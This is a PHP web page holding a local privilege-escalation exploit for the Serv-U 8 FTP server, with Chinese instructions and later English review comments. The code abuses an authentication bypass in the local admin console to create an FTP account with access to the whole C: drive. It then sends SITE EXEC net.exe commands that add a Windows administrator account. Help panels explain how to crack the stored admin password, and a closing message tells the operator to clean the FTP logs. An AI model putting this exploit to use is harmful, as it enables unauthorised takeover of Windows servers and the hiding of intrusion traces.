<?
/*
serv-u 8 local exp ver 1.0
如果你在自己的服务器上发现这个文件,厄。。。那太遗憾了,别来找我。
这个文件到处都是,人人都能拿到。
*/
?>
<html>
<title>Serv-u 8 local exp ver 1.0</title>
<body>
<script>
// Reveals the hidden help panel whose element id is passed in (the two
// <div>s at the bottom of the page start with display:none).
function fun_showDiv(show)
{
    var panel = document.getElementById(show);
    panel.style.display = "block";
}
</script>
<b>Serv-u 8 local exp ver 1.0</b>
<form id="form1" name="form1" method="post" action="?">
<p><a href="#" onclick="fun_showDiv('adminpassdiv')">管理员密码</a>
<input type="text" name="admin_pwd" value="" />
</p>
<p>直接提权!
<input type="submit" name="cmd" value="提权" />
<a href="#" onclick="fun_showDiv('QAdiv')">QA</a>
</p>
<pre>
<?
//Global var
// Two local services are addressed, both on loopback: the Serv-U management
// console (HTTP on 43958) and the FTP service (21).
$port=43958;
$host="127.0.0.1";
$sessionid="";
$getuserid="";
$ftpport=21;
// Name of the account this script creates in Serv-U and then, through
// net.exe, in Windows. A fixed string like this is a cheap hunting indicator
// in Serv-U logs and in Windows Security account-creation events.
$ftpuser="lalala_hacked";
// Console password taken straight from the form field (unvalidated); it is also
// reused as the Windows password in $exec_addUser below.
$ftppwd=$_POST['admin_pwd'];
// Payloads later sent to the FTP server as SITE EXEC: create a local Windows
// user, then add it to the local Administrators group.
$exec_addUser="site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";
$exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser." /add";
// Nothing runs until the "提权" submit button posts cmd.
if($_POST['cmd']) {
//login-----------------------------------------
// Step 1: log in to the console with an EMPTY user name and the supplied
// password; the Referer carries LocalAdmin=1, the local-admin entry point the
// QA text further down describes.
$sock_login = fsockopen($host, $port);
$URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
$post_data_login['user'] = "";
$post_data_login['pword'] = $ftppwd;
$post_data_login['language'] = "zh%2CCN&";
$ref="http://".$host.":".$port."/?Session=39893&Language=zh,CN&LocalAdmin=1";
$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);
fputs($sock_login, $postStr);
// One 1280-byte read; the session id is scraped from the XML reply.
$result = fread($sock_login, 1280);
$sessionid = getmidstr("<sessionid>","</sessionid>",$result);
// NOTE(review): getmidstr() returns a non-empty "not found" message when the
// tags are absent, so this check passes even when login failed. The later
// "...成功!" messages in this block are printed without inspecting the
// response at all, so none of them is evidence the step worked.
if ($sessionid!="")
echo "登陆成功!";
fclose($sock_login);
//login-----------------------------------------
//getOrganizationId-------------------------------
// Step 2: fetch the server-users page with the session cookie and scrape the
// organization id that follows "OrganizationUsers.xml&ID=" in the HTML.
$OrganizationId="";
$sock_OrganizationId = fsockopen($host, $port);
$URL='/Admin/ServerUsers.htm?Page=1';
// Empty post data and empty referer: a bodyless POST to an .htm page.
$postStr = createRequest($port,$host,$URL,"",$sessionid,"");
fputs($sock_OrganizationId, $postStr);
$resultOrganizationId="";
// Unlike the other steps this one reads to EOF, since the page exceeds one buffer.
while(!feof($sock_OrganizationId)) {
$result = fread($sock_OrganizationId, 1024);
$resultOrganizationId=$resultOrganizationId.$result;
}
$strTmp = "OrganizationUsers.xml&ID=";
// Take a fixed-length slice after the marker, then cut at the first quote.
// If the marker is missing strpos() returns false (0 in arithmetic) and the
// slice is garbage, but the non-empty check below still reports success.
$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+15);
$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,"\""));
fclose($sock_OrganizationId);
if ($OrganizationId!="")
echo "获取OrganizationId".$OrganizationId."成功!";
//getOrganizationId-------------------------------
//getuserid---------------------------------------
// Step 3: ask the console to create a temporary user object under that
// organization (Command=AddObject) and scrape the new ObjectID from the reply.
$getuserid="";
$sock_getuserid = fsockopen($host, $port);
$URL="/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".$OrganizationId.".User&Temp=1&Sync=546666666666666663";
$ref="http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";
$post_data_getuserid="";
$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);
fputs($sock_getuserid, $postStr);
$result = fread($sock_getuserid, 1280);
$result = getmidstr("<var name=\"ObjectID\" val=\"","\" />",$result);
fclose($sock_getuserid);
$getuserid = $result;
if ($getuserid!="")
echo "获取用户ID".$getuserid."成功!";
//getuserid---------------------------------------
//addpower-----------------------------------------
// Step 4: attach a DirAccess rule for the root of the C: drive to the new
// user object. Access=7999 is replayed from a captured console request; its
// bit meaning is not derivable from this file.
$sock_addpower = fsockopen($host, $port);
$URL="/Admin/XML/Result.xml?Command=AddObject&Object=CUser.".$getuserid.".DirAccess&Sync=1227081437828";
$post_data_addpower['Access'] = "7999";
$post_data_addpower['MaxSize'] = "0";
$post_data_addpower['Dir'] = "c:\\";
$post_data_addpower['undefined'] = "undefined";
$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_addpower, $postStr,strlen($postStr));
// Response is read but never examined; the success message is unconditional.
$result = fread($sock_addpower, 1280);
fclose($sock_addpower);
echo "添加权限成功!";
//addpower-----------------------------------------
//adduser-----------------------------------------
// Step 5: turn the temporary object into a real, enabled account
// (Command=UpdateObject). The field list mirrors the console's user form;
// the percent-encoded values are UTF-8 Chinese combo-box labels, so this
// request was captured from a zh-CN console and is locale-specific.
$sock_adduser = fsockopen($host, $port);
$URL="/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.".$OrganizationId.".User.".$getuserid."&Sync=1227071190250";
$post_data_adduser['LoginID'] = $ftpuser;
$post_data_adduser['FullName'] = "";
// Hard-coded FTP password, reused verbatim in the PASS commands of step 6.
$post_data_adduser['Password'] = 'hahaha';
$post_data_adduser['ComboPasswordType'] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";
$post_data_adduser['PasswordType'] = "0";
$post_data_adduser['ComboAdminType'] = "%E6%97%A0%E6%9D%83%E9%99%90";
$post_data_adduser['AdminType'] = "";
// Home directory is the C: drive root, matching the DirAccess rule above.
$post_data_adduser['ComboHomeDir'] = "/c:";
$post_data_adduser['HomeDir'] = "/c:";
$post_data_adduser['ComboType'] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";
$post_data_adduser['Type'] = "0";
$post_data_adduser['ExpiresOn'] = "0";
$post_data_adduser['ComboWebClientStartupMode'] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";
$post_data_adduser['WebClientStartupMode'] = "";
$post_data_adduser['LockInHomeDir'] = "0";
$post_data_adduser['Enabled'] = "1";
$post_data_adduser['AlwaysAllowLogin'] = "1";
$post_data_adduser['Description'] = "";
$post_data_adduser['IncludeRespCodesInMsgFiles'] = "";
$post_data_adduser['ComboSignOnMessageFilePath'] = "";
$post_data_adduser['SignOnMessageFilePath'] = "";
$post_data_adduser['SignOnMessage'] = "";
$post_data_adduser['SignOnMessageText'] = "";
$post_data_adduser['ComboLimitType'] = "%E8%BF%9E%E6%8E%A5";
$post_data_adduser['LimitType'] = "Connection";
$post_data_adduser['QuotaBytes'] = "0";
$post_data_adduser['Quota'] = "0";
$post_data_adduser['Access'] = "7999";
$post_data_adduser['MaxSize'] = "0";
$post_data_adduser['Dir'] = "%25HOME%25";
$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_adduser, $postStr,strlen($postStr));
// Again read-and-discard; success is asserted without checking.
$result = fread($sock_adduser, 1280);
fclose($sock_adduser);
echo "添加用户成功!";
//adduser-----------------------------------------
//exec-------------------------------
// Step 6: plain FTP session as the new account, then one SITE EXEC per
// net.exe command (two separate connections). Each exchange is a single
// fgets()/fread() per reply with no status-code check.
// NOTE(review): "&$errno" is call-time pass-by-reference, removed in PHP 5.4;
// this block therefore only parses on legacy PHP.
$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "PASS hahaha";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = $exec_addUser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "执行".$exec_addUser."返回了$recvbuf";
fclose($sock_exec);
$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "PASS hahaha";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = $exec_addGroup."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "执行".$exec_addGroup."返回了$recvbuf";
fclose($sock_exec);
// The author's own closing line concedes that the FTP server logs the new
// account and the SITE EXEC commands - that log, the console access on 43958
// and the Windows account-creation events are where defenders should look.
echo "好了,自己3389上去清理ftp用户日志吧!";
//exec-------------------------------
}
/** function createRequest
Builds the raw HTTP/1.1 POST request string the script writes to the console
socket: request line, a fixed header set, an optional Session cookie and the
form-encoded body.
@port_post : administrator port $port=43958;
@host_post : host $host="127.0.0.1";
@URL_post : target $URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
@post_data_post : arraylist $post_data['user'] = "";... ("" sends an empty body)
@sessionid : console session id; when non-empty it is sent as "Cookie: Session=..."
@referer : value placed in the Referer header
@return httprequest string
*/
function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){
$data_string="";
// Form-encode the body: only the values are urlencode()d, keys go out as given.
if ($post_data_post!="")
{
foreach($post_data_post as $key=>$value)
{
$values[]="$key=".urlencode($value);
}
$data_string=implode("",$values);
}
// Request line and headers. $request is not initialised before the first .=
// (a notice on PHP). NOTE(review): in this copy the fragments are concatenated
// with no line terminators between them - almost certainly an extraction
// artefact of the original escape sequences; it is left as found.
$request.="POST ".$URL_post." HTTP/1.1";
$request.="Host: ".$host_post."";
$request.="Referer: ".$referer."";
$request.="Content-type: application/x-www-form-urlencoded";
$request.="Content-length: ".strlen($data_string)."";
// Fixed header set imitating the console's embedded browser control:
// "User-Agent: Serv-U" plus the x-user-agent / UA-CPU pair. The combination
// is a usable signature when monitoring requests to the management port.
$request.="User-Agent: Serv-U";
$request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";
$request.="Accept: */*";
// Header name is misspelled ("Cache-Contro"); kept verbatim since it goes on the wire.
$request.="Cache-Contro: no-cache";
$request.="UA-CPU: x86";
// The cookie obtained from the Login step authenticates every admin call.
if ($sessionid!="")
{
$request.="Cookie: Session=".$sessionid."";
}
// Header/body separator, then the body.
$request.="";
$request.=$data_string."";
return $request;
}
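//getMidfor2str copy from internet
/**
 * Returns the text between the first occurrence of $L and the first
 * occurrence of $R that follows it in $str.
 *
 * @param string $L   left marker
 * @param string $R   right marker
 * @param string $str haystack
 * @return string the enclosed text, or the literal not-found message when
 *                either marker is absent. Note the message is NON-empty, so a
 *                caller comparing the result against "" cannot detect failure.
 */
function getmidstr($L,$R,$str)
{
    // strpos() returns false (not -1) when the needle is absent, so the
    // checks below must be strict; the original compared against -1 and
    // tested $int_l twice, never $int_r.
    $int_l=strpos($str,$L);
    // Look for the right marker only after the left one, so an $R that
    // precedes $L is not taken as the closing marker (which produced a
    // negative substr() length before).
    $int_r=($int_l===false) ? false : strpos($str,$R,$int_l+strlen($L));
    if ($int_l!==false && $int_r!==false)
    {
        return substr($str,$int_l+strlen($L),$int_r-$int_l-strlen($L));
    }
    return "没找到需要的变量";
}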
?>
</pre>
</form>
<div id="adminpassdiv" style="display:none">
<pre>
默认为空,如果密码为空,<b>填什么都能进去。</b>
如果修改过,管理员密码默认会在这里:
<b>C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive</b>
文件中找到一个MD5密码值。
C:\Program Files\RhinoSoft.com\Serv-U
是su的根目录。
密码值的样式为(假设是123456)
kx#######################
#代表123456的32位MD5加密,而kx则是su对md5的密码算法改进的随机2位字符。
破解后的密码为<b>kx</b>123456,去掉kx就是密码了。
你可以针对这个加密生成字典。
</pre>
</div>
<div id="QAdiv" style="display:none">
<pre>
<b>提权的原理?</b>
Su8的管理平台是http的,继承了su7的方式。
抓包,分析,发现了以下流程是可以利用的。
1, 管理员从管理控制台打开web页面时,是不需要验证密码的。
2, 管理员如果用某URL打开web页面时,虽然需要输入密码,但是无论输入什么,都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3, 管理员可以添加用户有两种,一种是全局用户,一种是某个域下的用户。而权限设置也是两种,一种是全局,一种是针对用户。
4, 管理员添加了用户的这个包和设置权限这个包,是分开的。
所以,我可以抓包然后转换成php的socket连接post出去。
最后再用经典的ftp登陆,exec命令。达到提权。
前面su7已经说了很多,这里简单的说下好了。
.....登陆什么的。
1,获取ID。
2,给这个id添加权限。
3,给这个id赋予用户名,密码,目录,权限。
4,登陆后执行系统命令。
<b>为啥我明明显示成功了,但是却提不上去?</b>
这要看错误代码了,这里偶很惭愧,并没有写详细的错误代码判断。
一般有以下几种情况:
1,可能是因为管理员密码不对。
参照管理员密码的链接。
2,可能是因为管理员限制了执行SITE EXEC。
有待程序修改,程序可以加一个让他不限制的功能。
3,可能是程序问题。
</pre>
</div>
</body>
</html>